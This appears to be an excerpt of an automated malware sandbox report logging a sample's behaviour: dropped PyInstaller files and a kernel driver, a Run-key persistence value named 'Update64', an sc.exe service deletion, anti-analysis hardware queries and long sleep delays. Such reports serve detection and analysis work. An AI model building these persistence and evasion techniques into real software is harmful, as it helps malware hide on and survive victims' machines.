Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76522\unicodedata.pyd
Source: C:\Users\user\AppData\Local\Temp\etc test.exe File created: C:\ProgramData\rstywrmdprzs\esfowblknspo.exe
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80002\VCRUNTIME140.dll
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI77162\_wmi.pyd
Source: C:\Users\user\Desktop\Setup.exe File created: C:\Users\user\AppData\Local\Temp\Notepad.exe
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80002\_lzma.pyd
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI70442\unicodedata.pyd
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76522\_bz2.pyd
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76522\libffi-8.dll
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI70442\libcrypto-3.dll
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe File created: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe
Source: C:\Users\user\AppData\Local\Temp\etc test.exe File created: C:\ProgramData\rstywrmdprzs\esfowblknspo.exe
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe File created: C:\Users\user\Notepad.exe
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe File created: C:\Windows\Temp\trxhxvjzqipl.sys

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\Notepad.exe File created: C:\Users\user\Notepad.exe
Source: C:\Users\user\Notepad.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update64
Source: C:\Users\user\Notepad.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update64
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "OBKZWAPS"

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 51523
Source: unknown Network traffic detected: HTTP traffic on port 51523 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 51523
Source: unknown Network traffic detected: HTTP traffic on port 51523 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 51523 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 51523
Source: unknown Network traffic detected: HTTP traffic on port 51523 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 51523 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 51523
Source: unknown Network traffic detected: HTTP traffic on port 51523 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 51523 -> 49743
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F04F51E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 6_2_00007FF7F04F51E0
Source: C:\Users\user\AppData\Local\Temp\fix.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\Temp\fix.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\Setup.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Notepad.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\fix.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\fix.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Memory allocated: 1650000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Memory allocated: 3400000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Memory allocated: 19C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\fix.exe Memory allocated: F80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\fix.exe Memory allocated: 2A10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\fix.exe Memory allocated: 4A10000 memory reserve | memory write watch
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\fix.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4139
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7375
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 388
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Window / User API: threadDelayed 1032
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Window / User API: threadDelayed 1943
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7145
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 577
Source: C:\Users\user\AppData\Local\Temp\fix.exe Window / User API: threadDelayed 6236
Source: C:\Users\user\AppData\Local\Temp\fix.exe Window / User API: threadDelayed 1424
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4124
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80002\python312.dll
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70442\select.pyd
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76522\python312.dll
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70442\_lzma.pyd
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70442\python312.dll
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80002\_wmi.pyd
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77162\libcrypto-3.dll
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76522\_hashlib.pyd
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80002\_hashlib.pyd
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80002\unicodedata.pyd
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80002\_decimal.pyd
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70442\_decimal.pyd
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77162\_ctypes.pyd
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70442\_bz2.pyd
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76522\libcrypto-3.dll
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77162\_hashlib.pyd
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70442\_hashlib.pyd
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76522\select.pyd
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77162\_socket.pyd
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70442\_socket.pyd
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77162\unicodedata.pyd
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76522\_socket.pyd
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76522\_decimal.pyd
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77162\select.pyd
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77162\python312.dll
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70442\_ctypes.pyd
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80002\libcrypto-3.dll
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80002\_socket.pyd
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76522\_lzma.pyd
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76522\unicodedata.pyd
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77162\_lzma.pyd
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76522\_wmi.pyd
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80002\_ctypes.pyd
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77162\_bz2.pyd
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70442\_wmi.pyd
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77162\_wmi.pyd
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76522\_ctypes.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80002\_lzma.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80002\select.pyd Jump to dropped file
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Dropped PE file which has not been started: C:\Windows\Temp\trxhxvjzqipl.sys Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70442\unicodedata.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76522\_bz2.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70442\libcrypto-3.dll Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77162\_decimal.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80002\_bz2.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Notepad.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe API coverage: 3.2 %
Source: C:\Users\user\AppData\Local\Temp\etc test.exe API coverage: 4.0 %
Source: C:\Users\user\Notepad.exe API coverage: 0.9 %
Source: C:\ProgramData\rstywrmdprzs\esfowblknspo.exe API coverage: 4.0 %
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe API coverage: 3.2 %
Source: C:\Users\user\Notepad.exe API coverage: 0.9 %
Source: C:\Windows\System32\conhost.exe API coverage: 1.2 %
Source: C:\Users\user\Notepad.exe API coverage: 0.9 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3452 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5820 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7336 Thread sleep count: 7375 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7336 Thread sleep count: 388 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7440 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe TID: 7816 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe TID: 7172 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7384 Thread sleep count: 7145 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7364 Thread sleep count: 577 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7448 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\fix.exe TID: 5288 Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\fix.exe TID: 5288 Thread sleep time: -45000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\fix.exe TID: 7464 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\fix.exe TID: 7352 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592 Thread sleep count: 4124 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7416 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7576 Thread sleep count: 324 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2640 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\fix.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Notepad.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
Source: C:\Users\user\Notepad.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Notepad.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F04F8AF0 FindFirstFileExW,FindClose, 6_2_00007FF7F04F8AF0
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F050842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 6_2_00007FF7F050842C
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F05124C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 6_2_00007FF7F05124C4
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F050842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 6_2_00007FF7F050842C
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BD24C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 18_2_00007FF702BD24C4
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BC842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 18_2_00007FF702BC842C
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BB8AF0 FindFirstFileExW,FindClose, 18_2_00007FF702BB8AF0
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BC842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 18_2_00007FF702BC842C
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE10310150 GetSystemInfo,VirtualAlloc, 13_2_00007FFE10310150
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\fix.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\fix.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_01519FA0 LdrInitializeThunk, 7_2_01519FA0
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F050B1B8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00007FF7F050B1B8
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F05140D0 GetProcessHeap, 6_2_00007FF7F05140D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_0040159D EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit, 0_2_0040159D
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Code function: 3_2_00007FF7010C1160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,exit, 3_2_00007FF7010C1160
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F050B1B8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00007FF7F050B1B8
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F04FBE20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_00007FF7F04FBE20
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F04FC6AC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00007FF7F04FC6AC
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F04FC88C SetUnhandledExceptionFilter, 6_2_00007FF7F04FC88C
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Code function: 8_2_00007FF68CC61160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,_c_exit, 8_2_00007FF68CC61160
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE0C0B3CE0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_00007FFE0C0B3CE0
